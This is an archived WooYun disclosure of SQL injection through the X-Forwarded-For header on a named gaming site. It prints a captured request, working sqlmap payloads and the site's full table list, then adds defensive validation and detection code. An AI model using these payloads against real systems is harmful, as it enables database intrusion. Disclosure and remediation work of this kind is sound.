WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2016-05-03: Details have been sent to the vendor and are awaiting vendor handling.
2016-05-09: The vendor has actively ignored the vulnerability; details are disclosed to the public.
GET /Manage/Reg.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: q*
X-Requested-With: XMLHttpRequest
Referer: http://hd.91zjd.com/
Cookie: ASP.NET_SessionId=ibe25ph3xwts1fbihblpyjyf; PHPSESSID=cr8njnjl1mdsglra7j9gmmpd55; HMACCOUNT=E8E753AFF72A1AEA; CNZZDATA4909912=cnzz_eid%3D53645248-1461846717-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1461846717; Hm_lvt_13ddb2b3f776e22091a45a3f47d175d9=1461846714,1461846716; Hm_lpvt_13ddb2b3f776e22091a45a3f47d175d9=1461846716; bdshare_firstime=1461846715790; BAIDUID=3AA905FB43E5A681283C2869CC3F297A:FG=1; BAEID=AEB933863707154BAE91C97D8FD3C417:FG=1
Host: hd.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: q' AND 9916=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'kEJm'='kEJm

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: q';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: zjddb
[244 tables]
+-----------------------------------+
| FlashAd |
| JY_Aisoyo_class |
| SignInLogs |
| SignInRule |
| Sys_ProcErrorCollection |
| TBankDeposit |
| TBankSerialRes |
| TBankSerialResource |
| TBankWallet |
| TBattleMatchTable |
| TBattleRoomInfo |
| TChangeRecord |
| TChangeRecordUser |
| TCharmExchange |
| TContestInfo |
| TContestRecord |
| TContestRecord_New |
| TContestUserRecord |
| TFasciChangeRecord |
| TGMRecord |
| TGM_OperationRecord |
| TGameIPRule |
| TGameKindInfo |
| TGameLock |
| TGameNameInfo |
| TGamePropDefine |
| TGameRoomBase |
| TGameRoomInfo |
| TGameRoomMsg |
| TGameRoomTable |
| TGameServerInfo |
| TLockCode |
| TLoginRecord |
| TMatchTable |
| TMatchTableTest |
| TMoneyChangeRecord |
| TMoneyExceptLog |
| TPropBuyGive |
| TPropDefine |
| TReceiveMoneyDefind |
| TReceiveMoneyRecord |
| TRoomIPRule |
| TRoomRecord |
| TSendMoneyRecord |
| TSendMoneyRecord_New |
| TSignUp |
| TTransferRecord |
| TUserCallGM |
| TUserInfo |
| TUserList |
| TUserLoginGame |
| TUserNameRule |
| TUserProp |
| TUsers |
| TWLoginRecord |
| TZLoginRecord |
| T_InviteCodeRecord |
| T_PhoneExchangeSet |
| T_RewardConfig |
| T_RewardLog |
| T_RewardRecord |
| T_ShareConfig |
| T_Share_Invite_Log |
| VChangeRecord |
| VPropGive |
| VRoomList |
| VUserBuy |
| VUserListReceive |
| VUserListSend |
| VUserProp |
| VUsers |
| VUsersAlbum |
| Web_AdminEmail |
| Web_AdminModifyLog |
| Web_Agency |
| Web_AgencyAccountLog |
| Web_AgencyBalanceLog |
| Web_AgencyDayReport |
| Web_AgencyMoneyChangeLog |
| Web_AgencyPercentChange |
| Web_AgencyPopeSet |
| Web_AgencyRMBCost |
| Web_AlmsConfig |
| Web_AlmsDrawLog |
| Web_AnalyData_DateOnline |
| Web_Analy_DateReport |
| Web_Analy_MonthReport |
| Web_Analy_NewUserReport |
| Web_ApplyVipRoom |
| Web_Award |
| Web_AwardClass |
| Web_AwardLog |
| Web_BuyClothLog |
| Web_Card |
| Web_CharmExchangeLog |
| Web_ClearFasciPropDefine |
| Web_ClearFasciPropUseLog |
| Web_ClearingLog |
| Web_Clothes |
| Web_CompanyInfo |
| Web_Config |
| Web_ContestRank |
| Web_Count_AgencyOnline |
| Web_Count_OnlineUsers |
| Web_Count_RoomOnline |
| Web_CreateID |
| Web_DataAnaly_Users |
| Web_DataClearLog |
| Web_DayTaxReport |
| Web_Exchange |
| Web_FasciExchangeConfig |
| Web_FasciExchangeLog |
| Web_FineryID |
| Web_FriendLink |
| Web_GUID |
| Web_GameGuidList |
| Web_GameInfo |
| Web_GameMain |
| Web_GameType |
| Web_IndexFlash |
| Web_Link |
| Web_Log |
| Web_LotterAward |
| Web_LotterConfig |
| Web_LotterLog |
| Web_LotterSpecial |
| Web_LotteriesLog |
| Web_Manage_Model |
| Web_Manage_Popedom |
| Web_MatchAwardConfig |
| Web_MatchSendType |
| Web_MobilePayConfig |
| Web_MobilePayGameType |
| Web_MoneyChangeLog |
| Web_MoneyStatEveryday |
| Web_NewsData |
| Web_NewsType |
| Web_PConfig |
| Web_PVAndIPStat |
| Web_PlayerDayReport |
| Web_PointChangeLog |
| Web_PropChangeLog |
| Web_RMBCost |
| Web_RebateInfo |
| Web_System |
| Web_TGClearingRecord |
| Web_TGPayRecord |
| Web_TaxStatEveryDay |
| Web_TransLog |
| Web_TransfersAccount |
| Web_TuiGuang |
| Web_TuiGuangLog |
| Web_UserAlbum |
| Web_UserAlbumColumn |
| Web_UserApplyVipRecord |
| Web_UserModifyLog |
| Web_Users |
| Web_VAgencyBalanceLog |
| Web_VAgency_UserPayList |
| Web_VAnalyData_DateOnline |
| Web_VAnaly_AgencyDateReport |
| Web_VAnaly_DateReport |
| Web_VAnaly_GameCountAndTax |
| Web_VAnaly_NewUserPayList |
| Web_VAnaly_NewUserReport |
| Web_VAnaly_PayList |
| Web_VAnaly_UserList24A |
| Web_VAnaly_UserList24B |
| Web_VAnaly_UserListReg |
| Web_VApplyVipRoom |
| Web_VBankDeposit |
| Web_VBuyClothLog |
| Web_VChangeRecord |
| Web_VCharmExchange |
| Web_VDataList |
| Web_VFasciClearPropLog |
| Web_VFasciExchangeLog |
| Web_VGameKindList |
| Web_VGameNameInfo |
| Web_VGameRoomInfo |
| Web_VGameRoomInfo2 |
| Web_VGetAgencyDetail1 |
| Web_VGetPlayDetail |
| Web_VGetUserOnline |
| Web_VLotterLog |
| Web_VLotterSpecial |
| Web_VMatchAwardConfig |
| Web_VMatchLog |
| Web_VMatchLog_New |
| Web_VMatchTable |
| Web_VMoneyChangeRecord |
| Web_VPropBuyGive |
| Web_VReceiveMoneyLog |
| Web_VTContestRoom |
| Web_VTGLog |
| Web_VTuiGuang |
| Web_VUserBattlePoint |
| Web_VUserGameMoney |
| Web_VUsersList |
| Web_ValmsDrawRecord |
| Web_manage_admin |
| Web_msg |
| Web_vAgencyAccountLog |
| Web_vAgencyAndPlayerSumPoint_List |
| Web_vAgencyExchange |
| Web_vAgencyList |
| Web_vAgencySpareValue |
| Web_vAgencySpareValueLog |
| Web_vAwardLog |
| Web_vAwardRecord |
| Web_vBankMoneyOpera |
| Web_vBuyPropLog |
| Web_vBuyVipLog |
| Web_vExchangeFasciLog |
| Web_vFaciSum |
| Web_vGameRecord |
| Web_vNewsList |
| Web_vPlayerSpareValue |
| Web_vPropTotal |
| Web_vSendMoneyRecord_New |
| Web_vTaxStatEveryday |
| Web_vTransferLog |
| Web_vUserAlbumColumn |
| Web_vUserAllMoneyChangeLog |
| Web_vUserList |
| Web_vUserLoginList |
| Web_vUserMoneyRank |
| Web_vUserPoint |
| Web_vUserTime |
| TGM_AwardType |
| sqlmapoutput |
| view_EveyMonthAnaly_monthReport |
| view_PayByAnage |
| view_PayByAnageAaySuccess |
| view_getNewsByTOPN |
| web_AgencyAccount |
| web_AgencyRebateLog |
| web_SystemMsg |
| web_UserMoneyChange |
| web_VPayTotalRecord |
| web_VPlayerLoginLog |
| web_VTGBalanceLog |
| web_vGetVipLog |
| web_vTGpayClearing |
+-----------------------------------+
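The request and sqlmap output above show the pattern behind this finding: the application reads the X-Forwarded-For header (presumably to record the visitor's IP on the registration page) and splices it straight into a SQL statement, so both an error-based payload and a stacked `WAITFOR DELAY` succeed. The example below is added here as an illustration of the defensive side and is not code from the report or from the affected site. It assumes a hypothetical access-log format (`<timestamp> <method> <path> xff=<header value>`), constructed sample lines that reuse the payload shapes from the report, and SQLite standing in for SQL Server. It shows the three things a defender wants: strict validation of the header as a list of IP literals, a fallback to the socket peer address when validation fails, a parameterised insert so that whatever reaches the database is bound as data, and a scan over log lines that flags requests whose X-Forwarded-For value is not a plausible IP list.

```python
import ipaddress
import re
import sqlite3
from typing import List, Optional

# Constructed sample log lines in a hypothetical format; not from the report.
# The last three reuse the X-Forwarded-For values seen in the sqlmap session.
SAMPLE_LOG = """\
2016-04-28T12:31:57 GET /Manage/Reg.aspx xff=203.0.113.10
2016-04-28T12:31:58 GET /Manage/Reg.aspx xff=203.0.113.10, 198.51.100.7
2016-04-28T12:31:59 GET /Manage/Reg.aspx xff=q*
2016-04-28T12:32:00 GET /Manage/Reg.aspx xff=q' AND 9916=CONVERT(INT,(SELECT CHAR(113))) AND 'kEJm'='kEJm
2016-04-28T12:32:05 GET /Manage/Reg.aspx xff=q';WAITFOR DELAY '0:0:5'--
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<method>\S+) (?P<path>\S+) xff=(?P<xff>.*)$")


def parse_xff(value: str) -> Optional[List[str]]:
    """Parse an X-Forwarded-For value as a comma-separated list of IP literals.

    Returns the normalised IP strings, or None if any element is not an IPv4/IPv6
    address. Anything that is not an address (including an empty header) is
    rejected as a whole rather than partially accepted.
    """
    ips = []
    for part in value.split(","):
        try:
            ips.append(str(ipaddress.ip_address(part.strip())))
        except ValueError:
            return None
    return ips


def client_ip_for_storage(xff: Optional[str], remote_addr: str) -> str:
    """Pick the IP to persist: the first XFF hop if the whole header validates,
    otherwise the TCP peer address, which the client cannot forge in-band."""
    if xff:
        ips = parse_xff(xff)
        if ips:
            return ips[0]
    return remote_addr


def new_log_db() -> sqlite3.Connection:
    """In-memory SQLite table standing in for the site's visitor/login log."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visit_log (id INTEGER PRIMARY KEY, path TEXT, ip TEXT)")
    return conn


def record_visit(conn: sqlite3.Connection, path: str, ip: str) -> int:
    """Parameterised insert: the value is bound, never concatenated into SQL text,
    so a payload such as q';WAITFOR DELAY '0:0:5'-- is stored as a literal string."""
    cur = conn.execute("INSERT INTO visit_log (path, ip) VALUES (?, ?)", (path, ip))
    conn.commit()
    return cur.lastrowid


def flag_suspicious_xff(log_text: str) -> List[dict]:
    """Detection pass: return every request whose X-Forwarded-For is not an IP list.
    Legitimate proxies only ever put addresses in this header, so any other
    content is worth an alert regardless of whether it looks like SQL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        xff = m.group("xff")
        if parse_xff(xff) is None:
            findings.append({"ts": m.group("ts"), "path": m.group("path"), "xff": xff})
    return findings


if __name__ == "__main__":
    for f in flag_suspicious_xff(SAMPLE_LOG):
        print(f"{f['ts']} {f['path']} suspicious X-Forwarded-For: {f['xff']!r}")
    db = new_log_db()
    ip = client_ip_for_storage("q';WAITFOR DELAY '0:0:5'--", "192.0.2.1")
    print("stored ip:", ip, "row", record_visit(db, "/Manage/Reg.aspx", ip))
```

The validation step is the real fix: once the header is parsed as addresses, nothing SQL-shaped can reach the query. The parameterised insert is defence in depth, and the log scan turns the same rule into a detection that would have flagged the scanner traffic in this report.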
Severity: No impact (vendor ignored)
Ignored at: 2016-05-09 09:00
Vulnerability Rank: 4 (WooYun rating)
None